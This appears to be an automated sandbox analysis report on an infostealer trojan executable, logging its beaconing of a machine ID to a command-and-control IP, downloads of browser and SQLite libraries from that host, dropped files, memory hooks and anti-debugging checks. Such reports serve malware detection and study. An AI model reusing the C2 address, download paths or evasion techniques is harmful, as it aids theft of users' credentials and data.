00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:26 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.62.56.113
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:28 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveVary: Accept-EncodingVary: Accept-EncodingVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: sqlite3.dll.0.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: https://mozilla.org0
                        Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: VASkmEQ4iU.exe, 00000000.00000003.468343594.0000000005131000.00000004.00000800.00020000.00000000.sdmp, 5VjcxCywK8MY.0.dr, p7T157RypD9o.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: recordHost: 185.62.56.113Content-Length: 95Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 61 6c 66 6f 6e 73 26 63 6f 6e 66 69 67 49 64 3d 64 66 36 33 65 37 39 32 63 39 31 35 32 32 37 39 39 33 34 61 61 33 37 31 34 64 62 63 30 36 63 31 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=df63e792c9152279934aa3714dbc06c1
                        Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nssdbm3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 185.62.56.113Connection: Keep-AliveCache-Control: no-cache

                        System Summary

                        barindex
                        Source: VASkmEQ4iU.exeStatic PE information: section name: .>\A
                        Source: VASkmEQ4iU.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: VASkmEQ4iU.exe, 00000000.00000002.480981180.00000000018EF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehelper.exe0 vs VASkmEQ4iU.exe
                        Source: VASkmEQ4iU.exeBinary or memory string: OriginalFilenamehelper.exe0 vs VASkmEQ4iU.exe
                        Source: VASkmEQ4iU.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: VASkmEQ4iU.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: VASkmEQ4iU.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: sqlite3.dll.0.drStatic PE information: Number of sections : 18 > 10
                        Source: VASkmEQ4iU.exeReversingLabs: Detection: 48%
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeMutant created: \Sessions\1\BaseNamedObjects\54881015517
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeFile created: C:\Users\user\AppData\LocalLow\nss3.dllJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/12@0/1
                        Source: softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %s
                        Source: sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: sqlite3.dll.0.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                        Source: sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: sqlite3.dll.0.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: sqlite3.dll.0.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: softokn3.dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: VASkmEQ4iU.exeStatic file information: File size 7389696 > 1048576
                        Source: VASkmEQ4iU.exeStatic PE information: Raw size of .JFL is bigger than: 0x100000 < 0x704800
                        Source: VASkmEQ4iU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: freebl3.pdb source: freebl3.dll.0.dr
                        Source: Binary string: softokn3.pdbp source: softokn3.dll.0.dr
                        Source: Binary string: mozglue.pdb@+ source: mozglue.dll.0.dr
                        Source: Binary string: nss3.pdb source: nss3.dll.0.dr
                        Source: Binary string: mozglue.pdb source: mozglue.dll.0.dr
                        Source: Binary string: softokn3.pdb source: softokn3.dll.0.dr
                        Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                        Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.0.dr
                        Source: VASkmEQ4iU.exeStatic PE information: section name: .sI3
                        Source: VASkmEQ4iU.exeStatic PE information: section name: .>\A
                        Source: VASkmEQ4iU.exeStatic PE information: section name: .JFL
                        Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                        Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                        Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                        Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                        Source: sqlite3.dll.0.drStatic PE information: section name: /4
                        Source: sqlite3.dll.0.drStatic PE information: section name: /19
                        Source: sqlite3.dll.0.drStatic PE information: section name: /31
                        Source: sqlite3.dll.0.drStatic PE information: section name: /45
                        Source: sqlite3.dll.0.drStatic PE information: section name: /57
                        Source: sqlite3.dll.0.drStatic PE information: section name: /70
                        Source: sqlite3.dll.0.drStatic PE information: section name: /81
                        Source: sqlite3.dll.0.drStatic PE information: section name: /92
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .JFL
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeFile created: C:\Users\user\AppData\LocalLow\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeFile created: C:\Users\user\AppData\LocalLow\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeFile created: C:\Users\user\AppData\LocalLow\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeFile created: C:\Users\user\AppData\LocalLow\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeFile created: C:\Users\user\AppData\LocalLow\mozglue.dllJump to dropped file
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeFile created: C:\Users\user\AppData\LocalLow\msvcp140.dllJump to dropped file

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeMemory written: PID: 2432 base: 9F0005 value: E9 FB 99 36 77
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeMemory written: PID: 2432 base: 77D59A00 value: E9 0A 66 C9 88
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeMemory written: PID: 2432 base: D80007 value: E9 7B 4C 01 77
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeMemory written: PID: 2432 base: 77D94C80 value: E9 8E B3 FE 88

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeSpecial instruction interceptor: First address: 000000000187619E instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeSpecial instruction interceptor: First address: 0000000001236577 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeRDTSC instruction interceptor: First address: 000000000189158B second address: 0000000001891596 instructions: 0x00000000 rdtsc 0x00000002 mov esi, dword ptr [esp+28h] 0x00000006 movzx bx, al 0x0000000a dec esi 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeRDTSC instruction interceptor: First address: 0000000000DF4968 second address: 0000000000DF4973 instructions: 0x00000000 rdtsc 0x00000002 mov esi, dword ptr [esp+28h] 0x00000006 movzx bx, al 0x0000000a dec esi 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeRegistry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeSystem information queried: ModuleInformation

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeSystem information queried: KernelDebuggerInformation
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeProcess queried: DebugPort
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeProcess queried: DebugPort
                        Source: C:\Users\user\Desktop\VASkmEQ4iU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.VASkmEQ4iU.exe.1a1aca3.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.VASkmEQ4iU.exe.1a1aca3.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.460242946.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.470300145.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.458303380.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.468368220.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
